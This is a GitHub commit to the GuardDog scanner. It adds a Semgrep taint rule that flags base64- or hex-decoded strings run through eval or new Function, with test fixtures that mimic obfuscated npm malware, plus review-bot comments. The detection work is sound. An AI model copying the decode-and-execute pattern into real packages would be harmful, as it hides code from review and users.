Merge pull request #456 from DataDog/s.obregoso/FN_npm-exec-base64
FN: Adding a new detection case to npm-exec-base64
sobregosodd authored Sep 10, 2024
2 parents bed12d1 + 247b6ea commit 217a20e
Showing 2 changed files with 27 additions and 7 deletions.
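--- a/guarddog/analyzer/sourcecode/npm-exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
@@ -9,8 +9,17 @@ rules:
 languages:
 - javascript
 severity: WARNING
-patterns:
-- pattern-not: eval('...')
-- pattern-not: eval("...")
-- pattern-not: eval(`...`)
-- pattern: eval(atob(...))
+mode: taint
+pattern-sources:
+- pattern-either:
+- pattern: Buffer.from(...)
+- pattern: atob(...)
+pattern-sinks:
+- pattern-either:
+- patterns:
+- pattern-inside: |
+$FN = new Function(...)
+...
+- pattern: $FN(...)
+- patterns:
+- pattern: eval(...)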
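Review bot: The `new Function` sink under `pattern-sinks` is placed on the later call `$FN(...)` and requires a preceding `$FN = new Function(...)` assignment, but the decoded text already becomes code at the constructor, which is not itself a sink here. A constructor that is invoked without being assigned first would not match the `pattern-inside`, and one called with no arguments may not be reported, depending on how the engine propagates taint through `new Function`. Adding `- pattern: new Function(...)` to the sinks' `pattern-either` would report the point where decoded data turns into code. Since `Buffer.from(...)` is now a source for every encoding, a short comment in the rule saying that hex and other decodings are intentionally in scope would explain why the rule id still says base64.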
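--- a/tests/analyzer/sourcecode/npm-exec-base64.js
+++ b/tests/analyzer/sourcecode/npm-exec-base64.js
@@ -1,2 +1,13 @@
-// ruleid: npm-exec-base64
-eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
+function f(){
+// ruleid: npm-exec-base64
+eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
+}
+
+function f() {
+import fetch from "node-fetch"
+const admin = "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"
+const adminResult = Buffer.from(admin, 'hex').toString('utf8');
+const func = new Function(adminResult);
+// ruleid: npm-exec-base64
+func(adminResult);
+}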
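Review bot: The second fixture places `import fetch from "node-fetch"` inside the body of `f`, which is not valid JavaScript because static imports are only allowed at module top level, so the `new Function` case passes only if the parser recovers from that error; `fetch` is unused and the line can be dropped. Both fixtures are named `f`, and renaming one avoids the redeclaration. The case calls `func(adminResult)`, passing the decoded string a second time as an argument, so an additional `func()` case annotated with `// ruleid: npm-exec-base64` would pin the more direct form. An `// ok: npm-exec-base64` case such as `eval("1 + 1")` would also pin that literal arguments stay unflagged now that the `pattern-not` lines are gone.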
